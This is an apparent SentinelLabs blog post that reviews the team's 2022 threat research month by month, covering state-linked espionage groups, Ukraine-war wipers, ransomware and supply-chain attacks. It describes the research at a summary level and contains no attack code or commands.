2022 has been another eventful year for the SentinelLabs research team, with events in Ukraine dominating and directing a large portion of our research output. We also hosted the first ever LABScon, bringing together top tier researchers and thought leaders from across the industry, and found time to investigate a number of supply chain attacks, adversaries, macOS, Linux and Windows malware, and exploitable vulnerabilities.
We’ve seen a shift in ransomware TTPs with increasing use of hybrid and partial encryption and a greater focus from threat actors on stealing data for ransom as well as – and sometimes instead of – using file lockers.
All our research and threat intelligence posts can be found on the SentinelLabs home page, but for a quick recap of the year’s main highlights, take a scroll through the 2022 timeline below.
In January, we identified new variants of the PowGoop malware belonging to Iranian-linked threat actor MuddyWater. We described how this adversary used tunneling tools and likely exploited CVE-2020-0688 on Exchange servers to compromise governmental organizations in the Middle East. Like many other Iranian threat actors, the group displays less sophistication and technological complexity compared to other state-sponsored APT groups but continues to be successful through its use of publicly available offensive security tools and exploitation of unpatched vulnerabilities.
January also saw SentinelLabs post research on threat hunting for macOS adware infections, recent hacktivist campaigns, and analyses of BlackCat ransomware, and CVE-2021-45608 – a flaw in NetUSB affecting millions of routers.
The Russian invasion of Ukraine in February 2022 was an event that had, and continues to have, a global impact. It was widely expected that the Russian campaign would be swift and decisive, and accompanied by an equally destructive cyber warfare campaign. Those expectations turned out to be far from correct. While the resolve of the Ukrainians took both the Russians and many observers by surprise, the cyber campaigns associated with the war also had an unexpected dimension. In February, the first of these was a new destructive wiper that SentinelLabs dubbed Hermetic Wiper, a signed driver targeting Windows devices in Ukrainian organizations.
This month, SentinelLabs also exposed a decade-old state-sponsored adversary named ModifiedElephant targeting human rights activists, lawyers, academics and others involved in civilian dissent in India. The objective of ModifiedElephant is long-term surveillance that at times concludes with the delivery of ‘evidence’—files that incriminate the target in specific crimes—prior to conveniently coordinated arrests.
SentinelLabs also reported on an Iranian threat actor, TunnelVision, exploiting the Log4j2 and other vulnerabilities against Middle East and US targets.
As the war in Ukraine gathered pace, so did the cyber attacks: WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero were all reported on across the industry, but AcidRain saw a new development. An attempt to take out Ukrainian military command-and-control capabilities by hindering satellite connectivity spilled over to affect German infrastructure with remote monitoring and control of almost 6000 Enercon wind turbines disrupted by an attack on Viatsat modems.
It turns out it hasn’t only been the Russians targeting Ukraine, either. In March, SentinelLabs reported on a Chinese threat actor Scarab APT attempting to infect organizations in Ukraine with HeaderTip malware. Meanwhile, multiple critical severity flaws in Microsoft Azure’s Defender for IoT were disclosed by SentinelLabs that could allow unauthenticated attackers to remotely compromise devices.
In April, SentinelLabs’ focus turned to crimeware with research on LockBit 3.0 discovering that threat actors were sideloading Cobalt Strike beacons via a signed VMware xfer logs command line utility. We subsequently discovered this technique was connected with an affiliate Microsoft tracks as DEV-0401, a threat actor that had not previously been known to use LockBit.
SentinelLabs also published on Nokoyama ransomware in April, finding that it was clearly an evolution of Karma/Nemty rather than Hive, as suggested by some earlier analyses.
Supply-chain attacks via shared code repositiores were flavor of the month in May. SentinelLabs reported on CrateDepression this month, a supply-chain attack against the Rust development community. This followed an advisory from the Rust Security Response Working Group announcing the discovery of a malicious crate that targeted victims using GitLab Continuous Integration (CI) pipelines. Infected CI pipelines were served a second-stage payload we identified as Go binaries built on the red-teaming framework, Mythic. Both macOS and Linux payloads were available to the threat actors.
Also in May, threat actors targeted PyPI with a malicious Python package in a typosquatting campaign. We noted how the macOS payload used a similar obfuscation technique to OSX.Zuru in 2021 to drop a Cobalt Strike beacon on infected devices.
June 2022 saw SentinelLabs’ research turn to focus on Chinese-linked threat activity. Our research revealed a newly-discovered APT dubbed Aoqin Dragon that had been quietly spying on government, education, and telecommunication organizations in Southeast Asia and Australia for over a decade.
We found that the threat actor had a history of using document lures with pornographic themes to infect users and typically drops one of two backdoors: Mongall and a modified version of the open source Heyoka project.
In July, SentinelLabs research discovered that a Chinese state-sponsored cyber espionage group had set its sights on Russian targets in the midst of the Ukraine war.
We also explored how malicious Windows applications created as APPX and MISIX packages were being used by threat actors as an alternative infection vector to Office macros. LockBit 3.0 continued to be a significant threat for many enterpriss and we published new research on LockBit’s latest anti-analysis and evasion techniques.
Furthering our research on alternative vectors in light of Microsoft’s announced lockdown of Office Macros, SentinelLabs published on how Windows shortcuts, LNK files, were being abused by threat actors. This detailed research was based on an analysis of over 27,000 malicious LNK file samples.
We discovered that Windows Explorer was the top LOLBin (living off the land binary) in the chain of LOLBins that threat actors use to execute malware via LNK files.
September was the month of LABScon, and unsurprisingly saw some big reveals from the SentinelLabs research team. First up came Metador, a mysterious threat actor that SentinelLabs found had been targeting telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.
We also published research on Void Balaur, a cyber mercenary group running hack-for-hire campaigns throughout 2022 on targets in the United States, Russia, Ukraine, and other countries. SentinelLabs also reported on JuiceLedger, a relativey new threat actor focused on infostealing through a .NET
assembly called ‘JuiceStealer’, and its phishing campaign against PyPI contributors.
In October, our research returned to focusing on Chinese-linked APTs with research on a new threat cluster we track as WIP19.
WIP19 has been targeting telecommunications and IT service providers in the Middle East and Asia using a stolen digital certificate signed by a company called “DEEPSoft”. The activity was notable for the fact that almost all operations performed by the threat actor were conducted in a “hands-on keyboard” manner, with the attacker foregoing using C2 channels in exchange for increased stealth.
As the festive and holiday season started to approach, our focus turned once again to crimeware actors that typically ramp up their activities as the year rounds to a close. Our research into SocGholish noted how the actors had significantly diversified and expanded their infrastructure for staging malware with new servers, many of which were located in Europe, with the Netherlands, the United Kingdom, and France at the top of the list.
We also covered Black Basta ransomware and were the first to note links to its tools and cybercrime gang FIN7. For those who missed out on LABScon, we began a series of posts on some of the presentations that took to the main stage.
SentinelLabs was as busy at the end of the year as at the beginning. In December, we published research into crimeware group Vice Society, revealing how the group had pivoted to using a custome-branded ransomware variant we dubbed ‘PolyVice’.
We also dug deeper into Metador, exploring the anti-analysis techniques used in one of the actor’s backdoors, Mafalda. In collaboration with industry partners, we published on POORTRY and STONESTOP malware, used in active intrusions into telecommunication, BPO, MSSP, and financial services businesses.
SentinelOne was an early pioneer of the use of AI and machine learning in cybersecurity, but the technology hit public awareness in a big way with OpenAI’s release of ChatGPT 3. We found time to report on the wonders of this AI tool for the work of malware analysis and reverse engineering, and of course, we topped off the year by sharing more LABScon talks for the rest of the cybersecurity world to enjoy and learn from.
Throughout 2022, SentinelLabs has kept defenders informed and up-to-date on the latest developments across the crimeware ecosystem, adversaries, APTs, malware campaigns and critical vulnerabilities, and we’re not quite done yet: look out for a special LABScon talk that we’ll share before the New Year.
We’ll be back in 2023 with more security research, threat intelligence and vulnerability reporting. In the meantime, we wish all a happy, secure and peaceful New Year and 2023. Predictions for what 2023 in cybersecurity might look like from both SentinelLabs researchers and SentinelOne thought leaders can be found here.